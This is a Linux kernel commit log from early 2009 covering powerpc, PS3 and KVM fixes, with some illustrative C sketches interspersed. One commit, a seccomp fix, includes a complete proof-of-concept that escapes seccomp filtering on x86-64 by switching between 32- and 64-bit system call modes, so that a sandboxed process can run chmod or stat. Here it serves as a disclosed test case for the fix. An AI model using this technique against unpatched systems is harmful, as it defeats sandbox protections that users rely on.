- 24 March 2009, 17 commits
-
-
Committed by Hollis Blanchard
Although BOOKE_MAX_INTERRUPT has the right value, its meaning does not match. Signed-off-by: Liu Yu <yu.liu@freescale.com> Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
When an itlb or dtlb miss happens, E500 needs to update some MMU registers so that the auto-load mechanism can work when writing a TLB entry. Signed-off-by: Liu Yu <yu.liu@freescale.com> Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
Signed-off-by: Liu Yu <yu.liu@freescale.com> Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
E500 doesn't support this instruction. Signed-off-by: Liu Yu <yu.liu@freescale.com> Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
Signed-off-by: Liu Yu <yu.liu@freescale.com> Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
The kernel for E500 needs to clear DBSR at startup, so add a dbsr register to kvm_vcpu_arch for BOOKE. Signed-off-by: Liu Yu <yu.liu@freescale.com> Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
The Book E code will be shared with e500. I've left PID in kvmppc_core_emulate_op() just so that we don't need to move kvmppc_set_pid() right now. Once we have the e500 implementation, we can probably share that too. Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
e500 will provide its own implementation of these. Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
Passing just the TLB index will ease an e500 implementation. Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Hollis Blanchard
Signed-off-by: Hollis Blanchard <hollisb@us.ibm.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Jan Kiszka
Remove the remaining arch fragments of the old guest debug interface that now break non-x86 builds. Signed-off-by: Jan Kiszka <jan.kiszka@siemens.com> Signed-off-by: Avi Kivity <avi@redhat.com>
-
Committed by Jan Kiszka
This rips out the support for KVM_DEBUG_GUEST and introduces a new IOCTL instead: KVM_SET_GUEST_DEBUG. The IOCTL payload consists of a generic part, controlling the "main switch" and the single-step feature. The arch-specific part adds an x86 interface for intercepting both types of debug exceptions separately and re-injecting them when the host was not interested. Moreover, the foundation for guest debugging via debug registers is laid. To signal breakpoint events properly back to userland, an arch-specific data block is now returned along with KVM_EXIT_DEBUG. For x86, the arch block contains the PC, the debug exception, and relevant debug registers to tell debug events properly apart. The availability of this new interface is signaled by KVM_CAP_SET_GUEST_DEBUG. Empty stubs for not-yet-supported archs are provided. Note that both SVM and VTX are supported, but only the latter has been tested so far. Based on the experience with all those VTX corner cases, I would be fairly surprised if SVM works out of the box. Signed-off-by: Jan Kiszka <jan.kiszka@siemens.com> Signed-off-by: Avi Kivity <avi@redhat.com>
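To make the new interface concrete, here is a minimal userspace sketch of enabling single-stepping through KVM_SET_GUEST_DEBUG; the vcpu_fd parameter and the error handling are illustrative assumptions, not part of the patch.

```c
#include <linux/kvm.h>
#include <sys/ioctl.h>
#include <stdio.h>

/* Enable single-step debugging on one vcpu; vcpu_fd is assumed to be an
 * already-created vcpu file descriptor. */
static int enable_single_step(int vcpu_fd)
{
        struct kvm_guest_debug dbg = {
                .control = KVM_GUESTDBG_ENABLE | KVM_GUESTDBG_SINGLESTEP,
        };

        if (ioctl(vcpu_fd, KVM_SET_GUEST_DEBUG, &dbg) < 0) {
                perror("KVM_SET_GUEST_DEBUG");
                return -1;
        }
        return 0;
}
```

On a KVM_EXIT_DEBUG exit, userspace then reads the arch-specific block from the run structure (run->debug.arch) to tell the debug events apart.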
-
- 23 March 2009, 1 commit
-
-
Committed by Kumar Gala
Grant picked up the wrong version of "Respect _PAGE_COHERENT on classic ppc32 SW" (commit a4bd6a93). It was missing the code to actually deal with the fixup of _PAGE_COHERENT based on the CPU feature. Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
-
- 18 March 2009, 1 commit
-
-
Committed by Geoff Levand
Update ps3_defconfig. This sets the following options: CONFIG_PS3_VRAM=m, CONFIG_BLK_DEV_DM=m, CONFIG_USB_HIDDEV=y, CONFIG_EXT4_FS=y. Signed-off-by: Geoff Levand <geoffrey.levand@am.sony.com> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
-
- 17 March 2009, 2 commits
-
-
Committed by Kumar Gala
Since we now set _PAGE_COHERENT in the Linux PTE, we shouldn't be clearing it out before we set up the SW TLB. Today all the SW TLB machines (603/e300) that we support are non-SMP; however, there are errata on some devices that cause us to set _PAGE_COHERENT via CPU_FTR_NEED_COHERENT. Signed-off-by: Kumar Gala <galak@kernel.crashing.org> Signed-off-by: Grant Likely <grant.likely@secretlab.ca>
-
Committed by Piotr Ziecik
BestComm, a DMA engine in the MPC52xx SoC, requires snooping to work properly when CPU caches are enabled. Adding CPU_FTR_NEED_COHERENT fixes the NFS problems on MPC52xx machines introduced by 'powerpc/mm: Fix handling of _PAGE_COHERENT in BAT setup code' (sha1: 4c456a67). Signed-off-by: Piotr Ziecik <kosmo@semihalf.com> Signed-off-by: Grant Likely <grant.likely@secretlab.ca>
-
- 13 March 2009, 1 commit
-
-
Committed by Geert Uytterhoeven
Convert the PS3 Video RAM Storage Driver from an MTD driver to a plain block device driver. The ps3vram driver exposes unused video RAM on the PS3 as a block device suitable for storage or swap. Fast data transfer is achieved using a local cache in system RAM and DMA transfers via the GPU. The new driver is about 50% faster for reading and about 10% faster for writing. Signed-off-by: Geert Uytterhoeven <Geert.Uytterhoeven@sonycom.com> Acked-by: Geoff Levand <geoffrey.levand@am.sony.com> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
-
- 10 March 2009, 1 commit
-
-
Committed by Guennadi Liakhovetski
Defining the flash partition table in platform code is deprecated, and due to recent changes linkstation and storcenter no longer compile with their default configurations because of undefined references to physmap_set_partitions(). Instead of fixing them by using the correct kernel configuration macro in a preprocessor conditional, remove the partition table definitions altogether. Instead, add support for defining partitions on the command line and in the device tree to the default configurations. Signed-off-by: Guennadi Liakhovetski <g.liakhovetski@gmx.de> Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
-
- 04 March 2009, 1 commit
-
-
Committed by Tony Breeds
commit a969e76a (powerpc: Correct USB support for GE Fanuc SBC610) introduced a fixup for NEC USB controllers. This fixup should only run on GEF SBC610 boards. Fixes Fedora bug #486511. (https://bugzilla.redhat.com/show_bug.cgi?id=486511) Signed-off-by: Tony Breeds <tony@bakeyournoodle.com> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
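As a hedged illustration of restricting such a fixup to one board, the sketch below guards a PCI quirk with a device-tree compatible check; the compatible string, the device ID, and the fixup body are assumptions, not taken from the actual patch.

```c
#include <linux/pci.h>
#include <linux/of.h>

/* Illustrative only: skip the quirk unless we are running on the GEF SBC610.
 * The "gef,sbc610" compatible string and the device ID are assumptions. */
static void gef_sbc610_nec_usb_fixup(struct pci_dev *pdev)
{
        if (!of_machine_is_compatible("gef,sbc610"))
                return;         /* leave other boards untouched */

        /* ... board-specific controller setup would go here ... */
        dev_info(&pdev->dev, "applied GEF SBC610 NEC USB fixup\n");
}
DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_NEC, PCI_DEVICE_ID_NEC_USB,
                         gef_sbc610_nec_usb_fixup);
```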
-
- 03 March 2009, 1 commit
-
-
Committed by Roland McGrath
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process makes a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit:

/* test case for seccomp circumvention on x86-64

   There are two failure modes: compile with -m64 or compile with -m32.

   The -m64 case is the worst one, because it does "chmod 777 ." (could
   be any chmod call). The -m32 case demonstrates it was able to do
   stat(), which can glean information but not harm anything directly.

   A buggy kernel will let the test do something, print, and exit 1; a
   fixed kernel will make it exit with SIGKILL before it does anything. */

#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>

int main (int argc, char **argv)
{
  char buf[100];
  static const char dot[] = ".";
  long ret;
  unsigned st[24];

  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

#ifdef __x86_64__
  assert ((uintptr_t) dot < (1UL << 32));
  asm ("int $0x80 # %0 <- %1(%2 %3)"
       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
  ret = snprintf (buf, sizeof buf,
                  "result %ld (check mode on .!)\n", ret);
#elif defined __i386__
  asm (".code32\n"
       "pushl %%cs\n"
       "pushl $2f\n"
       "ljmpl $0x33, $1f\n"
       ".code64\n"
       "1: syscall # %0 <- %1(%2 %3)\n"
       "lretl\n"
       ".code32\n"
       "2:"
       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
  if (ret == 0)
    ret = snprintf (buf, sizeof buf,
                    "stat . -> st_uid=%u\n", st[7]);
  else
    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif

  write (1, buf, ret);

  syscall (__NR_exit, 1);
  return 2;
}

Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-
- 01 March 2009, 1 commit
-
-
Committed by Grant Likely
Virtex FPGA designs have two serial port logic cores to choose from: the simple uartlite and the full-featured uart16550. Both cores are in common use, so the defconfig should support both of them. Currently the defconfig only supports a console on uartlite. This patch adds console support for the 16550 core. The Virtex reference designs do not work without this patch. Signed-off-by: Grant Likely <grant.likely@secretlab.ca>
-
- 27 February 2009, 1 commit
-
-
Committed by Benjamin Herrenschmidt
The PCI 2.x cells used on some 44x SoCs only let us configure the decode for the low 32 bits of the incoming PLB addresses. The top 4 bits (this is a 36-bit bus) are hard-wired to different values depending on the specific SoC in use. Our code used to work "by accident" until I added support for the ISA memory holes and, while at it, added more validity checking of the addresses. This patch should bring it back to working condition. It still relies on the device tree being correct, but that's somewhat a prerequisite for anything to work anyway. Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org> Acked-by: Geert Uytterhoeven <Geert.Uytterhoeven@sonycom.com> Acked-by: Josh Boyer <jwboyer@linux.vnet.ibm.com>
-
- 26 February 2009, 3 commits
-
-
Committed by Mark Nelson
This fixes a regression introduced by commit a4e22f02 ("powerpc: Update 64bit __copy_tofrom_user() using CPU_FTR_UNALIGNED_LD_STD"). The same bug that existed in the 64bit memcpy() also exists here, so fix it here too. The fix is the same as that applied to memcpy(), with the addition of fixes for the exception-handling code required for __copy_tofrom_user(). This stops us reading beyond the end of the source region we were told to copy. Signed-off-by: Mark Nelson <markn@au1.ibm.com> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
-
Committed by Mark Nelson
This fixes a regression introduced by commit 25d6e2d7 ("powerpc: Update 64bit memcpy() using CPU_FTR_UNALIGNED_LD_STD"). This commit allowed CPUs that have the CPU_FTR_UNALIGNED_LD_STD CPU feature bit present to do the memcpy() with unaligned load doubles. But along with this came a bug where our final load double would read bytes beyond a page boundary and into the next (unmapped) page. This was caught by enabling CONFIG_DEBUG_PAGEALLOC. The fix was to read only the number of bytes that we need to store rather than reading a full 8-byte doubleword and storing only a portion of that. In order to minimise the amount of existing code touched, we use the original do_tail for the src_unaligned case. Below is an example of the regression, as reported by Sachin Sant:

  Unable to handle kernel paging request for data at address 0xc00000003f380000
  Faulting instruction address: 0xc000000000039574
  cpu 0x1: Vector: 300 (Data Access) at [c00000003baf3020]
      pc: c000000000039574: .memcpy+0x74/0x244
      lr: d00000000244916c: .ext3_xattr_get+0x288/0x2f4 [ext3]
      sp: c00000003baf32a0
     msr: 8000000000009032
     dar: c00000003f380000
   dsisr: 40000000
    current = 0xc00000003e54b010
    paca    = 0xc000000000a53680
    pid     = 1840, comm = readahead
  enter ? for help
  [link register   ] d00000000244916c .ext3_xattr_get+0x288/0x2f4 [ext3]
  [c00000003baf32a0] d000000002449104 .ext3_xattr_get+0x220/0x2f4 [ext3] (unreliable)
  [c00000003baf3390] d00000000244a6e8 .ext3_xattr_security_get+0x40/0x5c [ext3]
  [c00000003baf3400] c000000000148154 .generic_getxattr+0x74/0x9c
  [c00000003baf34a0] c000000000333400 .inode_doinit_with_dentry+0x1c4/0x678
  [c00000003baf3560] c00000000032c6b0 .security_d_instantiate+0x50/0x68
  [c00000003baf35e0] c00000000013c818 .d_instantiate+0x78/0x9c
  [c00000003baf3680] c00000000013ced0 .d_splice_alias+0xf0/0x120
  [c00000003baf3720] d00000000243e05c .ext3_lookup+0xec/0x134 [ext3]
  [c00000003baf37c0] c000000000131e74 .do_lookup+0x110/0x260
  [c00000003baf3880] c000000000134ed0 .__link_path_walk+0xa98/0x1010
  [c00000003baf3970] c0000000001354a0 .path_walk+0x58/0xc4
  [c00000003baf3a20] c000000000135720 .do_path_lookup+0x138/0x1e4
  [c00000003baf3ad0] c00000000013645c .path_lookup_open+0x6c/0xc8
  [c00000003baf3b70] c000000000136780 .do_filp_open+0xcc/0x874
  [c00000003baf3d10] c0000000001251e0 .do_sys_open+0x80/0x140
  [c00000003baf3dc0] c00000000016aaec .compat_sys_open+0x24/0x38
  [c00000003baf3e30] c00000000000855c syscall_exit+0x0/0x40

Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
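The idea behind the fix can be sketched in C (the real code is assembler); copying the tail byte by byte is a simplified stand-in for what the patch does with partial loads.

```c
#include <stddef.h>

/* Illustrative only: copy the final `rem` bytes (rem < 8) one at a time.
 * Loading a full 8-byte doubleword here and discarding the unused part could
 * read past src + rem, possibly into an unmapped page. */
static void copy_tail(unsigned char *dst, const unsigned char *src, size_t rem)
{
        while (rem--)
                *dst++ = *src++;
}
```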
-
Committed by Michael Neuling
When we introduced VSX, we changed the way FPRs are stored in the thread_struct. Unfortunately, we missed the load/store float double alignment handler code when updating how we access FPRs in the thread_struct. The patch below fixes this and merges the little- and big-endian cases. Signed-off-by: Michael Neuling <mikey@neuling.org> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
-
- 15 February 2009, 1 commit
-
-
Committed by Sheng Yang
kvm_arch_sync_events() is introduced to quiesce all other events that may happen concurrently with the VM destroy process, such as IRQ handlers and the work struct for assigned devices. Because kvm_arch_sync_events() is called at the very beginning of kvm_destroy_vm(), the KVM state at that point is still valid and provides an environment in which the other events can be quiesced. Signed-off-by: Sheng Yang <sheng@linux.intel.com> Signed-off-by: Avi Kivity <avi@redhat.com>
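A minimal sketch of the ordering described above; the teardown steps are placeholders, not the real body of kvm_destroy_vm().

```c
/* Illustrative ordering only: the arch hook runs before any VM state is torn
 * down, so IRQ handlers and queued work still see a consistent VM while they
 * are being quiesced. */
static void destroy_vm_sketch(struct kvm *kvm)
{
        kvm_arch_sync_events(kvm);      /* stop/flush concurrent events first */

        /* ... then release assigned devices, memory slots, vcpus, arch state ... */
}
```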
-
- 13 February 2009, 4 commits
-
-
Committed by Michael Neuling
Fix the VSX alignment handler for VSX registers 32-63, which are stored in the VMX part of the thread_struct, not the FPR part. Signed-off-by: Michael Neuling <mikey@neuling.org> CC: stable@kernel.org (2.6.27 & .28 please) Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
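A hedged sketch of the register-area selection the fix implies; the field names and pointer arithmetic are assumptions for illustration, not copied from the patch.

```c
/* Illustrative only: VSX registers 0-31 overlay the FP registers in the
 * thread_struct, while VSX 32-63 overlay the VMX (Altivec) registers.
 * The fpr/vr field names are assumptions. */
static void *vsx_reg_area(struct thread_struct *t, unsigned int vsx_reg)
{
        if (vsx_reg < 32)
                return &t->fpr[vsx_reg];        /* FP side */
        return &t->vr[vsx_reg - 32];            /* VMX side */
}
```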
-
Committed by Geoff Levand
Change the PS3 hotplug memory routine ps3_mm_add_memory() from a core_initcall to a device_initcall. core_initcall routines run before the powerpc topology_init() startup routine, which is a subsys_initcall, resulting in failure of ps3_mm_add_memory() when CONFIG_NUMA=y. When ps3_mm_add_memory() fails, the system boots with just the 128 MiB of boot memory. Signed-off-by: Geoff Levand <geoffrey.levand@am.sony.com> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
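A minimal sketch of the change in initcall level; the function body is omitted and the declaration details are assumptions, but the ordering comment reflects how initcall levels run.

```c
/* Initcall levels run in order: core -> postcore -> arch -> subsys -> fs ->
 * device -> late. Registering at device_initcall level guarantees this runs
 * after topology_init(), which is a subsys_initcall. */
static int __init ps3_mm_add_memory(void)
{
        /* ... hotplug the remaining PS3 memory region (body omitted) ... */
        return 0;
}
device_initcall(ps3_mm_add_memory);     /* was: core_initcall(ps3_mm_add_memory); */
```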
-
Committed by Dave Hansen
Fix the powerpc NUMA reserve bootmem page selection logic. Commit 8f64e1f2 (powerpc: Reserve in bootmem lmb reserved regions that cross NUMA nodes) changed the logic for how the powerpc LMB reserved regions were converted to bootmem reserved regions. As the following discussion reports, the new logic was not correct.

mark_reserved_regions_for_nid() goes through each LMB on the system that specifies a reserved area. It searches for active regions that intersect with that LMB and are on the specified node. It attempts to bootmem-reserve only the area where the active region and the reserved LMB intersect. We can not reserve things on other nodes as they may not have bootmem structures allocated yet.

We base the size of the bootmem reservation on two possible things. Normally, we just make the reservation start and stop exactly at the start and end of the LMB. However, the LMB reservations are not aware of NUMA nodes and on occasion a single LMB may cross into several adjacent active regions. Those may even be on different NUMA nodes and will require separate calls to the bootmem reserve functions. So, the bootmem reservation must be trimmed to fit inside the current active region.

That's all fine and dandy, but we trim the reservation in a page-aligned fashion. That's bad because we start the reservation at a non-page-aligned address: physbase. The reservation may only span 2 bytes, but those bytes may span two pfns and cause a reserve_size of 2*PAGE_SIZE. Take the case where you reserve 0x2 bytes at 0x0fff and where the active region ends at 0x1000. You'll jump into that if() statement, but node_ar.end_pfn=0x1 and start_pfn=0x0. You'll end up with a reserve_size=0x1000, and then call reserve_bootmem_node(node, physbase=0xfff, size=0x1000); 0x1000 may not be on the same node as 0xfff. Oops.

In almost all the vm code, end_<anything> is not inclusive. If you have an end_pfn of 0x1234, page 0x1234 is not included in the range. Using PFN_UP instead of the (>> PAGE_SHIFT) will make this consistent with the other VM code.

We also need to do the math for the reserved size with physbase instead of start_pfn. node_ar.end_pfn << PAGE_SHIFT is *precisely* the end of the node. However, (start_pfn << PAGE_SHIFT) is *NOT* precisely the beginning of the reserved area. That is, of course, physbase. If we don't use physbase here, the reserve_size can be made too large.

From: Dave Hansen <dave@linux.vnet.ibm.com> Tested-by: Geoff Levand <geoffrey.levand@am.sony.com> Tested on PS3. Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
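The rounding difference the text relies on fits in two macros; these match the standard kernel PFN helpers and are shown only to make the off-by-one-page argument concrete.

```c
/* A bare shift rounds an address *down* to a page frame number, while PFN_UP
 * rounds *up*. Trimming a reservation that starts mid-page (physbase = 0xfff)
 * with the bare shift is what allowed reserve_size to spill past the node. */
#define PFN_DOWN(x)     ((x) >> PAGE_SHIFT)
#define PFN_UP(x)       (((x) + PAGE_SIZE - 1) >> PAGE_SHIFT)
```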
-
Committed by Philippe Gerum
Fix _PAGE_CHG_MASK so that pte_modify() does not affect the _PAGE_SPECIAL bit. Signed-off-by: Philippe Gerum <rpm@xenomai.org> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
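For context, a hedged sketch of why the mask matters: pte_modify() keeps only the bits in _PAGE_CHG_MASK when applying a new protection, so any bit missing from the mask (such as _PAGE_SPECIAL) is silently dropped. The definition below is the usual generic shape, not necessarily the exact powerpc variant.

```c
/* Typical shape of pte_modify(): preserve the bits listed in _PAGE_CHG_MASK
 * and take everything else from the new protection value. */
static inline pte_t pte_modify(pte_t pte, pgprot_t newprot)
{
        return __pte((pte_val(pte) & _PAGE_CHG_MASK) | pgprot_val(newprot));
}
```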
-
- 11 February 2009, 1 commit
-
-
Committed by Kumar Gala
The following commit:

  commit 64b3d0e8
  Author: Benjamin Herrenschmidt <benh@kernel.crashing.org>
  Date:   Thu Dec 18 19:13:51 2008 +0000

      powerpc/mm: Rework usage of _PAGE_COHERENT/NO_CACHE/GUARDED

broke setting of the _PAGE_COHERENT bit in the PPC HW PTE. Since we now actually set _PAGE_COHERENT in the Linux PTE, we shouldn't be clearing it out before we propagate it to the PPC HW PTE. Reported-by: Martyn Welch <martyn.welch@gefanuc.com> Signed-off-by: Kumar Gala <galak@kernel.crashing.org> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
-
- 10 February 2009, 4 commits
-
-
Committed by Michael Neuling
arch/powerpc/platforms/pseries/hotplug-memory.c uses remove_section_mapping() but doesn't include sparsemem.h, which defines it. This can cause compilation failures for some configs. Signed-off-by: Michael Neuling <mikey@neuling.org> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
-
Committed by Benjamin Herrenschmidt
The new legacy_mem file in sysfs is causing problems with X on machines that don't support legacy memory access. The way I initially implemented it, we would fail with -ENXIO when trying to mmap it, thus exposing to X that we do support the API but there is no legacy memory. Unfortunately, X's poor error handling is causing it to fail to start when it gets this error. This implements a workaround hack that maps anonymous memory instead (using shmem if VM_SHARED is set, just like /dev/zero does). Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
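A hedged sketch of the fallback described above; the function name is invented and error handling is simplified, but the shmem_zero_setup() call is the same trick /dev/zero uses for shared mappings.

```c
#include <linux/mm.h>
#include <linux/fs.h>

/* Illustrative only: when there is no legacy memory behind the file, hand the
 * caller anonymous memory instead of failing, so X can keep starting up. */
static int legacy_mem_anon_mmap(struct file *file, struct vm_area_struct *vma)
{
        if (vma->vm_flags & VM_SHARED)
                return shmem_zero_setup(vma);   /* shared: back the VMA with shmem */

        /* private: leave vm_ops unset and let anonymous pages be faulted in */
        return 0;
}
```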
-
Committed by Michael Neuling
arch/powerpc/oprofile/cell/spu_profiler.c is missing an asm/time.h include, which is required for ppc_proc_freq. This can cause compile failures for some config combinations. Signed-off-by: Michael Neuling <mikey@neuling.org> Acked-by: Arnd Bergmann <arnd@arndb.de> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
-
Committed by Steven Rostedt
Impact: fix dynamic ftrace with large modules in PPC64. The math to calculate the offset into the TOC that is taken from reading the trampoline is incorrect. The bottom half of the offset is a sign-extended short. The current code was using an OR to create the offset when it should have been using an addition. Signed-off-by: Steven Rostedt <srostedt@redhat.com> Acked-by: Geoff Levand <geoffrey.levand@am.sony.com> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
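A small worked example of why OR and addition give different results once the low half has been sign-extended; the numbers are made up for illustration.

```c
#include <stdint.h>
#include <stdio.h>

int main(void)
{
        /* Target offset 0x12348000, split as hi = 0x1235 (bumped up because the
         * low half is negative) and lo = 0x8000, which sign-extends to -0x8000. */
        uint32_t hi = 0x1235;
        int16_t lo = (int16_t)0x8000;

        uint32_t by_add = (hi << 16) + (int32_t)lo;           /* 0x12348000: correct */
        uint32_t by_or  = (hi << 16) | (uint32_t)(int32_t)lo; /* 0xffff8000: wrong   */

        printf("add: %#x  or: %#x\n", by_add, by_or);
        return 0;
}
```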
-